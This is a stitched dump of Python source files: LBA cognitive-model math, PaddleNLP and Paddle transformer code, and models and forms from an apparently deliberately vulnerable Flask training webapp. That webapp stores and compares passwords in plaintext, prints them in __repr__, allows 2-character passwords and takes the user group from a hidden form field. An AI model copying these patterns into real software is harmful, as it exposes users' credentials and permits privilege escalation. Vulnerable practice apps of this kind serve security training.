def fptcdf(z,x0max,chi,driftrate,sddrift):
if x0max < 1e-10:
return norm.cdf(chi/z,loc=driftrate,scale=sddrift)
zs = z * sddrift
zu = z * driftrate
chiminuszu = chi - zu
xx = chiminuszu - x0max
chizu = chiminuszu / zs
chizumax = xx / zs
tmp1 = zs * (norm.pdf(chizumax)-norm.pdf(chizu))
tmp2 = xx * norm.cdf(chizumax) - chiminuszu * norm.cdf(chizu)
return 1 + (tmp1 + tmp2) / x0max
def lba_pdf(t,x0max,chi,drift,sdI):
G = 1-fptcdf(z=t,x0max=x0max[1],chi=chi[1],driftrate=drift[1],sddrift=sdI[1])
out = G*fptpdf(z=t,x0max=x0max[0],chi=chi[0],driftrate=drift[0],sddrift=sdI[0])
out = out / (1 - (norm.cdf(-drift[0]/sdI[0]) * norm.cdf(-drift[1]/sdI[1])))
out[t<=0]=0
return out
def get_dens(rt, response, b, A, v, s, t0):
out = np.zeros(len(rt))
out[response==1] = lba_pdf(t=rt[response==1]-t0,x0max=[A,A],chi=[b,b],drift=v,sdI=s)
out[response==2] = lba_pdf(t=rt[response==2]-t0,x0max=[A,A],chi=[b,b],drift=[v[1],v[0]],sdI=[s[1],s[0]])
out = np.maximum(out,1e-10)
return out
return np.log(get_dens(rt, response, b, A, v, s, t0))
def lba_rvs(n,b,A,v,s,t0):
drift_1 = norm.rvs(loc=v[0],scale=s[0],size=n)
drift_2 = norm.rvs(loc=v[1],scale=s[1],size=n)
drift_1[drift_1 < 0] = 0
drift_2[drift_2 < 0] = 0
start_1 = np.array(uniform.rvs(loc=0,scale=A,size=n))
start_2 = np.array(uniform.rvs(loc=0,scale=A,size=n))
ttf_1 = (b-start_1) / drift_1
ttf_2 = (b-start_2) / drift_2
rt = np.minimum(ttf_1,ttf_2) + t0
ttf = np.column_stack((ttf_1,ttf_2))
resp = np.argmin(ttf,axis=1) + 1 #1=v1 accumulator, 2=v2 accumulator
return {'rt':rt,'resp':resp}
def truncnorm_logpdf(x,loc,scale,a=0,b=float('inf')):
a = (a - loc) / (scale)
b = (b - loc) / (scale)
lp = truncnorm.logpdf(x=x,loc=loc,scale=scale,a=a,b=b)
return lp
def truncnorm_rvs(size,loc,scale,a=0,b=float('inf')):
a = (a - loc) / (scale)
b = (b - loc) / (scale)
rv = truncnorm.rvs(size=size,loc=loc,scale=scale,a=a,b=b)
return rv
```
#### File: pyDE/pyDE/utils.py
```python
def idx(*args):
return '.'.join(map(str,list(args)))
```
|
{
"source": "jeff350/vulnerable-company-webapp-flask",
"score": 3
}
|
#### File: vulnerable-company-webapp-flask/vuln_corp/forms.py
```python
from flask_wtf import Form
from wtforms import StringField, SelectField, SubmitField, validators, PasswordField, HiddenField
from wtforms.fields.html5 import EmailField
from wtforms.widgets import TextArea
from vuln_corp.choices import ISSUE_STATUS, ISSUE_ASSIGNEES
from .models import User
class LoginForm(Form):
username = StringField("username", [validators.DataRequired("Please enter your username.")])
password = PasswordField('Password', [validators.DataRequired("Please enter a password.")])
submit = SubmitField("Sign In")
def __init__(self, *args, **kwargs):
Form.__init__(self, *args, **kwargs)
def validate(self):
if not Form.validate(self):
return False
user = User.query.filter(User.username == self.username.data.lower()).first()
if user and user.check_password(self.password.data):
return True
elif not user:
self.username.errors.append("Invalid username")
else:
self.password.errors.append("Invalid password")
return False
class SignupForm(Form):
username = StringField("username", [validators.DataRequired("Please enter your username."), validators.length(4, 32,
"Your username must be between %(min)d and %(max)d characters")])
firstname = StringField("First name", [validators.DataRequired("Please enter your first name.")])
lastname = StringField("Last name", [validators.DataRequired("Please enter your last name.")])
email = EmailField("Email", [validators.DataRequired("Please enter your email address."),
validators.Email("Please enter your email address.")])
group = HiddenField(u'Group', default='2')
password = PasswordField('Password', [validators.DataRequired("Please enter a password."), validators.length(2, 12,
"Your password must be between %(min)d and %(max)d characters.")])
bio = StringField('Bio', [])
submit = SubmitField("Create account")
def __init__(self, *args, **kwargs):
Form.__init__(self, *args, **kwargs)
def validate(self):
if not Form.validate(self):
return False
elif User.query.filter(User.username == str(self.username.data.lower())).first() is not None:
self.username.errors.append("Username is already taken")
return False
elif User.query.filter(User.email == str(self.email.data.lower())).first() is not None:
self.email.errors.append("E-mail is already taken")
return False
else:
return True
class EditUserForm(Form):
firstname = StringField("First name", [validators.DataRequired("Please enter your first name.")])
lastname = StringField("Last name", [validators.DataRequired("Please enter your last name.")])
email = EmailField("Email", [validators.DataRequired("Please enter your email address."),
validators.Email("Please enter your email address.")])
group = SelectField(u'Group', coerce=int)
password = StringField('Password', [validators.DataRequired("Please enter a password."), validators.length(2, 12,
"Your password must be between %(min)d and %(max)d characters.")])
bio = StringField('Bio', [])
submit = SubmitField("edit profile")
def __init__(self, *args, **kwargs):
Form.__init__(self, *args, **kwargs)
class IssueForm(Form):
title = StringField("Title", [validators.DataRequired("Enter a title for the issue")])
summary = StringField("Issue", [validators.DataRequired("Enter Your issue here")], widget=TextArea())
def __init__(self, *args, **kwargs):
Form.__init__(self, *args, **kwargs)
class EditIssueForm(Form):
title = StringField("Title", [validators.DataRequired("Enter a title for the issue")])
summary = StringField("Issue", [validators.DataRequired("Enter Your issue here")], widget=TextArea())
status = SelectField('type', choices=ISSUE_STATUS)
assignee = SelectField(u'User', choices=ISSUE_ASSIGNEES)
def __init__(self, *args, **kwargs):
Form.__init__(self, *args, **kwargs)
```
#### File: vulnerable-company-webapp-flask/vuln_corp/models.py
```python
import datetime
from vuln_corp import db
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(32), unique=True)
firstname = db.Column(db.String(32))
lastname = db.Column(db.String(32))
picture = db.Column(db.String(64))
bio = db.Column(db.String())
password = db.Column(db.String(32), unique=False)
group = db.Column(db.Integer)
email = db.Column(db.String(64), unique=True)
creation_date = db.Column(db.DateTime)
def __init__(self, username, firstname, lastname, email, password, group, bio):
self.username = username.lower()
self.firstname = firstname.title()
self.lastname = lastname.title()
self.email = email.lower()
self.password = password
self.group = group
self.picture = 'static/default.jpg'
self.creation_date = datetime.datetime.now()
self.bio = bio
def check_password(self, password):
return password == <PASSWORD>
def get_fullname(self):
return str(self.firstname) + ' ' + str(self.lastname)
def get_group(self):
return Groups.query.filter(Groups.id == self.group).first().groupname
def get_groupid(self, id):
return Groups.query.filter(Groups.id == id).first().groupname
def exists(self):
if self.username == User.query.filter(User.username == self.username).first().data():
return True
else:
return False
def get_session(self):
return Session.query.filter(Session.username == self.username).first()
def __repr__(self):
return '<Username:{} Password:{}>'.format(self.username, self.password)
class Session(db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(32), db.ForeignKey('user.username'))
session_id = db.Column(db.String(32), unique=True)
active = db.Column(db.Boolean)
def __init__(self, username, session_id, active):
self.username = username
self.session_id = session_id
self.active = active
def get_user(self):
return User.query.filter(User.username == self.username).first()
def __repr__(self):
return '<User:{} session_id:{} active:{}>'.format(self.username, self.session_id, self.active)
class Groups(db.Model):
id = db.Column(db.Integer, primary_key=True)
groupname = db.Column(db.String(64), unique=True)
def __init__(self, groupname):
self.groupname = groupname
def __repr__(self):
return '<group:{}>'.format(self.groupname)
class Issues(db.Model):
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String(100))
summary = db.Column(db.String(1000))
status = db.Column(db.String(60))
reported_by = db.Column(db.String(32))
assignee = db.Column(db.String(32))
completed = db.Column(db.Boolean)
completed_date = db.Column(db.DateTime)
issued_date = db.Column(db.DateTime)
def __init__(self, summary, title, reported_by):
self.summary = summary
self.title = title
self.status = 'New'
self.reported_by = reported_by
self.assignee = 'unassigned'
self.completed = False
self.issued_date = datetime.datetime.now()
self.completed_date = None
def mark_completed(self):
self.completed = True
self.completed_date = datetime.datetime.now()
```
|
{
"source": "jeff41404/PaddleNLP",
"score": 3
}
|
#### File: information_extraction/wordtag/predictor.py
```python
import json
import paddle
import paddle.nn as nn
from paddlenlp.datasets import MapDataset
from paddlenlp.data import Stack, Pad, Tuple
from paddlenlp.transformers import ErnieCtmWordtagModel, ErnieCtmTokenizer
class WordtagPredictor(object):
"""Predictor of wordtag model.
"""
def __init__(self, model_dir, tag_path, linking_path=None):
"""Initialize method of the predictor.
Args:
model_dir: The pre-trained model checkpoint dir.
tag_path: The tag vocab path.
linking_path:if you want to use linking mode, you should load link feature using.
"""
self._tags_to_index, self._index_to_tags = self._load_labels(tag_path)
self._model = ErnieCtmWordtagModel.from_pretrained(
model_dir,
num_cls_label=4,
num_tag=len(self._tags_to_index),
ignore_index=self._tags_to_index["O"])
self._model.eval()
self._tokenizer = ErnieCtmTokenizer.from_pretrained(model_dir)
self._summary_num = self._model.ernie_ctm.content_summary_index + 1
self.linking = False
if linking_path is not None:
self.linking_dict = {}
with open(linking_path, encoding="utf-8") as fp:
for line in fp:
data = json.loads(line)
if data["label"] not in self.linking_dict:
self.linking_dict[data["label"]] = []
self.linking_dict[data["label"]].append({
"sid": data["sid"],
"cls": paddle.to_tensor(data["cls1"]).unsqueeze(0),
"term": paddle.to_tensor(data["term"]).unsqueeze(0)
})
self.linking = True
self.sim_fct = nn.CosineSimilarity(dim=1)
@property
def summary_num(self):
"""Number of model summary token
"""
return self._summary_num
@staticmethod
def _load_labels(tag_path):
tags_to_idx = {}
i = 0
with open(tag_path, encoding="utf-8") as fp:
for line in fp:
line = line.strip()
tags_to_idx[line] = i
i += 1
idx_to_tags = dict(zip(*(tags_to_idx.values(), tags_to_idx.keys())))
return tags_to_idx, idx_to_tags
def _pre_process_text(self, input_texts, max_seq_len=128, batch_size=1):
infer_data = []
max_length = 0
for text in input_texts:
tokens = ["[CLS%i]" % i
for i in range(1, self.summary_num)] + list(text)
tokenized_input = self._tokenizer(
tokens,
return_length=True,
is_split_into_words=True,
max_seq_len=max_seq_len)
infer_data.append([
tokenized_input['input_ids'], tokenized_input['token_type_ids'],
tokenized_input['seq_len']
])
infer_ds = MapDataset(infer_data)
batchify_fn = lambda samples, fn=Tuple(
Pad(axis=0, pad_val=self._tokenizer.pad_token_id,dtype='int64'), # input_ids
Pad(axis=0, pad_val=self._tokenizer.pad_token_type_id,dtype='int64'), # token_type_ids
Stack(dtype='int64'), # seq_len
): fn(samples)
infer_data_loader = paddle.io.DataLoader(
infer_ds,
collate_fn=batchify_fn,
num_workers=0,
batch_size=batch_size,
shuffle=False,
return_list=True)
return infer_data_loader
def _decode(self, batch_texts, batch_pred_tags):
batch_results = []
for i, pred_tags in enumerate(batch_pred_tags):
pred_words, pred_word = [], []
text = batch_texts[i]
for j, tag in enumerate(pred_tags[self.summary_num:-1]):
if j > len(text) + self.summary_num - 1:
continue
pred_label = self._index_to_tags[tag]
if pred_label.find("-") != -1:
_, label = pred_label.split("-")
else:
label = pred_label
if pred_label.startswith("S") or pred_label.startswith("O"):
pred_words.append({
"item": text[j],
"offset": 0,
"wordtag_label": label
})
else:
pred_word.append(text[j])
if pred_label.startswith("E"):
pred_words.append({
"item": "".join(pred_word),
"offset": 0,
"wordtag_label": label
})
del pred_word[:]
for i in range(len(pred_words)):
if i > 0:
pred_words[i]["offset"] = pred_words[i - 1]["offset"] + len(
pred_words[i - 1]["item"])
pred_words[i]["length"] = len(pred_words[i]["item"])
result = {"text": text, "items": pred_words}
batch_results.append(result)
return batch_results
@paddle.no_grad()
def run(self,
input_texts,
max_seq_len=128,
batch_size=1,
return_hidden_states=None):
"""Predict a input text by wordtag.
Args:
input_text: input text.
max_seq_len: max sequence length.
batch_size: Batch size per GPU/CPU for training.
Returns:
dict -- wordtag results.
"""
if isinstance(input_texts, str):
input_texts = [input_texts]
if not isinstance(input_texts, str) and not isinstance(input_texts,
list):
raise TypeError(
f"Bad inputs, input text should be str or list of str, {type(input_texts)} found!"
)
infer_data_loader = self._pre_process_text(input_texts, max_seq_len,
batch_size)
all_pred_tags = []
with paddle.no_grad():
for batch in infer_data_loader:
input_ids, token_type_ids, seq_len = batch
seq_logits, cls_logits = self._model(
input_ids, token_type_ids, lengths=seq_len)
scores, pred_tags = self._model.viterbi_decoder(seq_logits,
seq_len)
all_pred_tags += pred_tags.numpy().tolist()
results = self._decode(input_texts, all_pred_tags)
outputs = results
if return_hidden_states is True:
outputs = (results, ) + (seq_logits, cls_logits)
return outputs
def _post_linking(self, pred_res, hidden_states):
for pred in pred_res:
for item in pred["items"]:
if item["item"] in self.linking_dict:
item_vectors = self.linking_dict[item["item"]]
item_pred_vector = hidden_states[1]
res = []
for item_vector in item_vectors:
vec = item_vector["cls"]
similarity = self.sim_fct(vec, item_pred_vector)
res.append({
"sid": item_vector["sid"],
"cosine": similarity.item()
})
res.sort(key=lambda d: -d["cosine"])
item["link"] = res
def run_with_link(self, input_text):
"""Predict wordtag results with term linking.
Args:
input_text: input text
Raises:
ValueError: raise ValueError if is not linking mode.
Returns:
pred_res: result with linking.
"""
if self.linking is False:
raise ValueError(
"Not linking mode, you should initialize object by ``WordtagPredictor(model_dir, linking_path)``."
)
pred_res = self.run(input_text, return_hidden_states=True)
self._post_linking(pred_res[0], pred_res[1:])
return pred_res[0]
```
|
{
"source": "jeff41404/Paddle",
"score": 2
}
|
#### File: nn/layer/fused_transformer.py
```python
from paddle.nn import functional as F
from paddle.incubate.nn import functional as incubate_f
from paddle.nn import Layer
from paddle.framework import ParamAttr
import paddle
from paddle.nn.layer.transformer import _convert_attention_mask, _convert_param_attr_to_list
from paddle.nn.initializer import Constant
import collections
class FusedMultiHeadAttention(Layer):
"""
Attention mapps queries and a set of key-value pairs to outputs, and
Multi-Head Attention performs multiple parallel attention to jointly attending
to information from different representation subspaces.
Please refer to `Attention Is All You Need <https://arxiv.org/pdf/1706.03762.pdf>`_
for more details.
Parameters:
embed_dim (int): The expected feature size in the input and output.
num_heads (int): The number of heads in multi-head attention.
dropout_rate (float, optional): The dropout probability used on attention
weights to drop some attention targets for the dropout after attention.
0 for no dropout. Default 0.5.
attn_dropout_rate (float, optional): The dropout probability used on attention
weights to drop some attention targets for the dropout in attention.
0 for no dropout. Default 0.5.
kdim (int, optional): The feature size in key. If None, assumed equal to
`embed_dim`. Default None.
vdim (int, optional): The feature size in value. If None, assumed equal to
`embed_dim`. Default None.
normalize_before (bool, optional): Indicate whether it is pre_layer_norm (True)
or post_layer_norm architecture (False). Default False.
need_weights (bool, optional): Indicate whether to return the attention
weights. Now, only False is supported. Default False.
weight_attr(ParamAttr, optional): To specify the weight parameter property.
Default: None, which means the default weight parameter property is used.
See usage for details in :code:`ParamAttr` .
bias_attr (ParamAttr|bool, optional): To specify the bias parameter property.
Default: None, which means the default bias parameter property is used.
If it is set to False, this layer will not have trainable bias parameter.
See usage for details in :code:`ParamAttr` .
Examples:
.. code-block:: python
# required: gpu
import paddle
# input: [batch_size, sequence_length, embed_dim]
query = paddle.rand((2, 4, 128))
# self attention mask: [batch_size, num_heads, query_len, query_len]
attn_mask = paddle.rand((2, 2, 4, 4))
multi_head_attn = paddle.incubate.nn.FusedMultiHeadAttention(128, 2)
output = multi_head_attn(query, None, None, attn_mask=attn_mask) # [2, 4, 128]
"""
def __init__(self,
embed_dim,
num_heads,
dropout_rate=0.5,
attn_dropout_rate=0.5,
kdim=None,
vdim=None,
normalize_before=False,
need_weights=False,
weight_attr=None,
bias_attr=None,
name=None):
super(FusedMultiHeadAttention, self).__init__()
assert embed_dim > 0, ("Expected embed_dim to be greater than 0, "
"but recieved {}".format(embed_dim))
assert num_heads > 0, ("Expected nhead to be greater than 0, "
"but recieved {}".format(num_heads))
attn_dropout_rate = dropout_rate if attn_dropout_rate is None else attn_dropout_rate
self.normalize_before = normalize_before
self._dtype = self._helper.get_default_dtype()
self._weight_attr = weight_attr
self._bias_attr = bias_attr
self.head_dim = embed_dim // num_heads
assert self.head_dim * num_heads == embed_dim, "embed_dim must be divisible by num_heads"
assert need_weights == False, "Only support need_weight is False now."
self.qkv_weight = self.create_parameter(
shape=[3, num_heads, self.head_dim, embed_dim],
attr=self._weight_attr,
dtype=self._dtype,
is_bias=False)
self.qkv_bias = self.create_parameter(
shape=[3, num_heads, self.head_dim],
attr=self._bias_attr,
dtype=self._dtype,
is_bias=True)
self.linear_weight = self.create_parameter(
shape=[embed_dim, embed_dim],
attr=self._weight_attr,
dtype=self._dtype,
is_bias=False)
self.linear_bias = self.create_parameter(
shape=[embed_dim],
attr=self._bias_attr,
dtype=self._dtype,
is_bias=True)
self.pre_ln_scale = self.create_parameter(
attr=self._weight_attr,
shape=[embed_dim],
default_initializer=Constant(value=1.0))
self.pre_ln_bias = self.create_parameter(
attr=self._bias_attr, shape=[embed_dim], is_bias=True)
self.ln_scale = self.create_parameter(
attr=self._weight_attr,
shape=[embed_dim],
default_initializer=Constant(value=1.0))
self.ln_bias = self.create_parameter(
attr=self._bias_attr, shape=[embed_dim], is_bias=True)
self.dropout_rate = dropout_rate
self.attn_dropout_rate = attn_dropout_rate
self.name = name
def forward(self, query, key=None, value=None, attn_mask=None, cache=None):
"""
Applies multi-head attention to map queries and a set of key-value pairs
to outputs.
Parameters:
query (Tensor): The queries for multi-head attention. It is a
tensor with shape `[batch_size, query_length, embed_dim]`. The
data type should be float32 or float64.
key (Tensor, optional): The keys for multi-head attention. It is
a tensor with shape `[batch_size, key_length, kdim]`. The
data type should be float32 or float64. If None, use `query` as
`key`. Default None.
value (Tensor, optional): The values for multi-head attention. It
is a tensor with shape `[batch_size, value_length, vdim]`.
The data type should be float32 or float64. If None, use `query` as
`value`. Default None.
attn_mask (Tensor, optional): A tensor used in multi-head attention
to prevents attention to some unwanted positions, usually the
paddings or the subsequent positions. It is a tensor with shape
broadcasted to `[batch_size, n_head, sequence_length, sequence_length]`.
When the data type is bool, the unwanted positions have `False`
values and the others have `True` values. When the data type is
int, the unwanted positions have 0 values and the others have 1
values. When the data type is float, the unwanted positions have
`-INF` values and the others have 0 values. It can be None when
nothing wanted or needed to be prevented attention to. Default None.
cache (MultiHeadAttention.Cache|MultiHeadAttention.StaticCache, optional):
Now, only None is supported. Default None.
Returns:
Tensor|tuple: It is a tensor that has the same shape and data type \
as `query`, representing attention output.
"""
if attn_mask is not None:
# Support bool or int mask
attn_mask = _convert_attention_mask(attn_mask, query.dtype)
assert cache == None, "Only support cache is None now."
out = incubate_f.fused_multi_head_attention(
x=query,
qkv_weight=self.qkv_weight,
linear_weight=self.linear_weight,
pre_layer_norm=self.normalize_before,
pre_ln_scale=self.pre_ln_scale,
pre_ln_bias=self.pre_ln_bias,
ln_scale=self.ln_scale,
ln_bias=self.ln_bias,
pre_ln_epsilon=1e-05,
qkv_bias=self.qkv_bias,
linear_bias=self.linear_bias,
attn_mask=attn_mask,
dropout_rate=self.dropout_rate,
attn_dropout_rate=self.attn_dropout_rate,
ln_epsilon=1e-05)
return out
class FusedFeedForward(Layer):
"""
Parameters:
d_model (int): The expected feature size in the input and output.
dim_feedforward (int): The hidden layer size.
dropout_rate (float, optional): The dropout probability used in pre-process
and post-precess. Default 0.1
activation (str, optional): The activation function. Default relu.
act_dropout_rate (float, optional): The dropout probability after activition.
If None, use the value of `dropout_rate`. Default None
normalize_before (bool, optional): Indicate whether to put layer normalization
into, preprocessing or postprocessing. Default False
weight_attr (ParamAttr, optional): The attribute for the learnable weight of this layer.
The default value is None and the weight will be initialized to zero. For detailed
information, please refer to paddle.ParamAttr.
bias_attr (ParamAttr|bool, optional): The attribute for the learnable bias of thi layer.
If it is set to False, no bias will be added to the output. If it is set to None or one
kind of ParamAttr, a bias parameter will be created according to ParamAttr. For detailed
information, please refer to paddle.ParamAttr. The default value is None and the bias
will be initialized to zero.
Examples:
.. code-block:: python
# required: gpu
import paddle
from paddle.incubate.nn import FusedFeedForward
fused_feedforward_layer = FusedFeedForward(8, 8)
x = paddle.rand((1, 8, 8))
out = fused_feedforward_layer(x)
print(out.numpy().shape)
# (1, 8, 8)
"""
def __init__(self,
d_model,
dim_feedforward,
dropout_rate=0.1,
activation="relu",
act_dropout_rate=None,
normalize_before=False,
weight_attr=None,
bias_attr=None):
super(FusedFeedForward, self).__init__()
assert d_model > 0, (
"Expected d_model to be greater than 0, but recieved {}".format(
d_model))
assert dim_feedforward > 0, (
"Expected dim_feedforward to be greater than 0, but recieved {}".
format(dim_feedforward))
self._dtype = self._helper.get_default_dtype()
self._d_model = d_model
self._dim_feedforward = dim_feedforward
self._dropout_rate = dropout_rate
self._act_dropout_rate = dropout_rate if act_dropout_rate is None else act_dropout_rate
self._act_method = activation
self._normalize_before = normalize_before
self._linear1_weight = self.create_parameter(
shape=[d_model, dim_feedforward],
attr=weight_attr,
dtype=self._dtype,
is_bias=False)
self._linear1_bias = self.create_parameter(
shape=[dim_feedforward],
attr=bias_attr,
dtype=self._dtype,
is_bias=True)
self._linear2_weight = self.create_parameter(
shape=[dim_feedforward, d_model],
attr=weight_attr,
dtype=self._dtype,
is_bias=False)
self._linear2_bias = self.create_parameter(
shape=[d_model], attr=bias_attr, dtype=self._dtype, is_bias=True)
self._ln1_scale = self.create_parameter(
shape=[d_model],
attr=None,
is_bias=False,
default_initializer=Constant(1.0))
self._ln1_bias = self.create_parameter(
shape=[d_model], attr=None, is_bias=True)
self._ln2_scale = self.create_parameter(
shape=[d_model],
attr=None,
is_bias=False,
default_initializer=Constant(1.0))
self._ln2_bias = self.create_parameter(
shape=[d_model], attr=None, is_bias=True)
def forward(self, src, cache=None):
out = incubate_f.fused_feedforward(
src, self._linear1_weight, self._linear2_weight, self._linear1_bias,
self._linear2_bias, self._ln1_scale, self._ln1_bias,
self._ln2_scale, self._ln2_bias, self._dropout_rate,
self._act_dropout_rate, self._act_method, self._normalize_before)
return out
class FusedTransformerEncoderLayer(Layer):
"""
FusedTransformerEncoderLayer is composed of two sub-layers which are self (multi-head)
attention and feedforward network. Before and after each sub-layer, pre-process
and post-precess would be applied on the input and output accordingly. If
`normalize_before` is True, pre-process is layer normalization and post-precess
includes dropout, residual connection. Otherwise, no pre-process and post-precess
includes dropout, residual connection, layer normalization.
Parameters:
d_model (int): The expected feature size in the input and output.
nhead (int): The number of heads in multi-head attention(MHA).
dim_feedforward (int): The hidden layer size in the feedforward network(FFN).
dropout_rate (float, optional): The dropout probability used in pre-process
and post-precess of MHA and FFN sub-layer. Default 0.1
activation (str, optional): The activation function in the feedforward
network. Default relu.
attn_dropout_rate (float, optional): The dropout probability used
in MHA to drop some attention target. If None, use the value of
`dropout`. Default None
act_dropout_rate (float, optional): The dropout probability used after FFN
activition. If None, use the value of `dropout`. Default None
normalize_before (bool, optional): Indicate whether to put layer normalization
into preprocessing of MHA and FFN sub-layers. If True, pre-process is layer
normalization and post-precess includes dropout, residual connection.
Otherwise, no pre-process and post-precess includes dropout, residual
connection, layer normalization. Default False
weight_attr(ParamAttr|list|tuple, optional): To specify the weight parameter property.
If it is a list/tuple, `weight_attr[0]` would be used as `weight_attr` for
MHA, and `weight_attr[1]` would be used as `weight_attr` for linear in FFN.
Otherwise, MHA and FFN both use it as `weight_attr` to create parameters.
Default: None, which means the default weight parameter property is used.
See usage for details in :code:`ParamAttr` .
bias_attr (ParamAttr|list|tuple|bool, optional): To specify the bias parameter property.
If it is a list/tuple, `bias_attr[0]` would be used as `bias_attr` for
MHA, and `bias_attr[1]` would be used as `bias_attr` for linear in FFN.
Otherwise, MHA and FFN both use it as `bias_attr` to create parameters.
The `False` value means the corresponding layer would not have trainable
bias parameter. See usage for details in :code:`ParamAttr` . Default: None,
which means the default bias parameter property is used.
Examples:
.. code-block:: python
# required: gpu
import paddle
from paddle.incubate.nn import FusedTransformerEncoderLayer
# encoder input: [batch_size, src_len, d_model]
enc_input = paddle.rand((2, 4, 128))
# self attention mask: [batch_size, n_head, src_len, src_len]
attn_mask = paddle.rand((2, 2, 4, 4))
encoder_layer = FusedTransformerEncoderLayer(128, 2, 512)
enc_output = encoder_layer(enc_input, attn_mask) # [2, 4, 128]
"""
def __init__(self,
d_model,
nhead,
dim_feedforward,
dropout_rate=0.1,
activation="relu",
attn_dropout_rate=None,
act_dropout_rate=None,
normalize_before=False,
weight_attr=None,
bias_attr=None):
self._config = locals()
self._config.pop("self")
self._config.pop("__class__", None) # py3
super(FusedTransformerEncoderLayer, self).__init__()
assert d_model > 0, ("Expected d_model to be greater than 0, "
"but recieved {}".format(d_model))
assert nhead > 0, ("Expected nhead to be greater than 0, "
"but recieved {}".format(nhead))
assert dim_feedforward > 0, (
"Expected dim_feedforward to be greater than 0, "
"but recieved {}".format(dim_feedforward))
attn_dropout_rate = dropout_rate if attn_dropout_rate is None else attn_dropout_rate
act_dropout_rate = dropout_rate if act_dropout_rate is None else act_dropout_rate
self.normalize_before = normalize_before
weight_attrs = _convert_param_attr_to_list(weight_attr, 2)
bias_attrs = _convert_param_attr_to_list(bias_attr, 2)
self.fused_attn = FusedMultiHeadAttention(
d_model,
nhead,
dropout_rate=attn_dropout_rate,
weight_attr=weight_attrs[0],
bias_attr=bias_attrs[0])
self.ffn = FusedFeedForward(
d_model,
dim_feedforward,
dropout_rate=dropout_rate,
act_dropout_rate=act_dropout_rate,
normalize_before=self.normalize_before,
weight_attr=weight_attrs[1],
bias_attr=bias_attrs[1])
def forward(self, src, src_mask=None, cache=None):
"""
Applies a Transformer encoder layer on the input.
Parameters:
src (Tensor): The input of Transformer encoder layer. It is
a tensor with shape `[batch_size, sequence_length, d_model]`.
The data type should be float32 or float64.
src_mask (Tensor, optional): A tensor used in multi-head attention
to prevents attention to some unwanted positions, usually the
paddings or the subsequent positions. It is a tensor with shape
broadcasted to `[batch_size, n_head, sequence_length, sequence_length]`.
When the data type is bool, the unwanted positions have `False`
values and the others have `True` values. When the data type is
int, the unwanted positions have 0 values and the others have 1
values. When the data type is float, the unwanted positions have
`-INF` values and the others have 0 values. It can be None when
nothing wanted or needed to be prevented attention to. Default None.
cache (Tensor, optional): It is an instance of `MultiHeadAttention.Cache`.
See `TransformerEncoderLayer.gen_cache` for more details. It is
only used for inference and should be None for training. Default
None.
Returns:
Tensor|tuple: It is a tensor that has the same shape and data type \
as `enc_input`, representing the output of Transformer encoder \
layer. Or a tuple if `cache` is not None, except for encoder \
layer output, the tuple includes the new cache which is same \
as input `cache` argument but `incremental_cache` has an \
incremental length. See `MultiHeadAttention.gen_cache` and \
`MultiHeadAttention.forward` for more details.
"""
src_mask = _convert_attention_mask(src_mask, src.dtype)
if cache is None:
attn_out = self.fused_attn(src, attn_mask=src_mask)
else:
attn_out, incremental_cache = self.fused_attn(
src, attn_mask=src_mask, cache=cache)
ffn_out = self.ffn(attn_out)
return ffn_out if cache is None else (ffn_out, incremental_cache)
class FusedTransformer(Layer):
"""
A Transformer model composed of an instance of `TransformerEncoder` and an
instance of `TransformerDecoder`. While the embedding layer and output layer
are not included.
Please refer to `Attention is all you need <http://papers.nips.cc/paper/7181-attention-is-all-you-need.pdf>`_ ,
and see `TransformerEncoder` and `TransformerDecoder` for more details.
Users can configurate the model architecture with corresponding parameters.
Note the usage of `normalize_before` representing where to apply layer
normalization (in pre-process or post-precess of multi-head attention or FFN),
and some transformer like models are different on this, such as
`BERT <https://arxiv.org/abs/1810.04805>`_ and `GPT2 <https://d4mucfpksywv.cloudfront.net/better-language-models/language-models.pdf>`_ .
The default architecture here places layer normalization in post-process and
applies another layer normalization on the output of last encoder/decoder layer.
Parameters:
d_model (int, optional): The expected feature size in the encoder/decoder input
and output. Default 512
nhead (int, optional): The number of heads in multi-head attention(MHA). Default 8
num_encoder_layers (int, optional): The number of layers in encoder. Default 6
num_decoder_layers (int, optional): The number of layers in decoder. Default 6
dim_feedforward (int, optional): The hidden layer size in the feedforward network(FFN). Default 2048
dropout (float, optional): The dropout probability used in pre-process
and post-precess of MHA and FFN sub-layer. Default 0.1
activation (str, optional): The activation function in the feedforward
network. Default relu.
attn_dropout (float, optional): The dropout probability used
in MHA to drop some attention target. If None, use the value of
`dropout`. Default None
act_dropout (float, optional): The dropout probability used after FFN
activition. If None, use the value of `dropout`. Default None
normalize_before (bool, optional): Indicate whether to put layer normalization
into preprocessing of MHA and FFN sub-layers. If True, pre-process is layer
normalization and post-precess includes dropout, residual connection.
Otherwise, no pre-process and post-precess includes dropout, residual
connection, layer normalization. Default False
weight_attr(ParamAttr|list|tuple, optional): To specify the weight parameter property.
If it is a list/tuple, the length of `weight_attr` could be 1, 2 or 3. If it is 3,
`weight_attr[0]` would be used as `weight_attr` for self attention, `weight_attr[1]`
would be used as `weight_attr` for cross attention of `TransformerDecoder`,
and `weight_attr[2]` would be used as `weight_attr` for linear in FFN.
If it is 2, `weight_attr[0]` would be used as `weight_attr` both for self attention
and cross attntion and `weight_attr[1]` would be used as `weight_attr` for
linear in FFN. If it is 1, `weight_attr[0]` would be used as `weight_attr`
for self attention, cross attention and linear in FFN. Otherwise,
the three sub-layers all uses it as `weight_attr` to create parameters.
Default: None, which means the default weight parameter property is used.
See usage for details
in :code:`ParamAttr` .
bias_attr (ParamAttr|list|tuple|bool, optional): To specify the bias parameter property.
If it is a list/tuple, the length of `bias_attr` could be 1, 2 or 3. If it is 3,
`bias_attr[0]` would be used as `bias_attr` for self attention, `bias_attr[1]`
would be used as `bias_attr` for cross attention of `TransformerDecoder`,
and `bias_attr[2]` would be used as `bias_attr` for linear in FFN.
If it is 2, `bias_attr[0]` would be used as `bias_attr` both for self attention
and cross attntion and `bias_attr[1]` would be used as `bias_attr` for
linear in FFN. If it is 1, `bias_attr[0]` would be used as `bias_attr`
for self attention, cross attention and linear in FFN. Otherwise,
the three sub-layers all uses it as `bias_attr` to create parameters.
The `False` value means the corresponding layer would not have trainable
bias parameter. See usage for details in :code:`ParamAttr` .
Default: None,which means the default bias parameter property is used.
custom_encoder (Layer, optional): If custom encoder is provided, use it as the encoder.
Default None
custom_decoder (Layer, optional): If custom decoder is provided, use it as the decoder.
Default None
Examples:
.. code-block:: python
import paddle
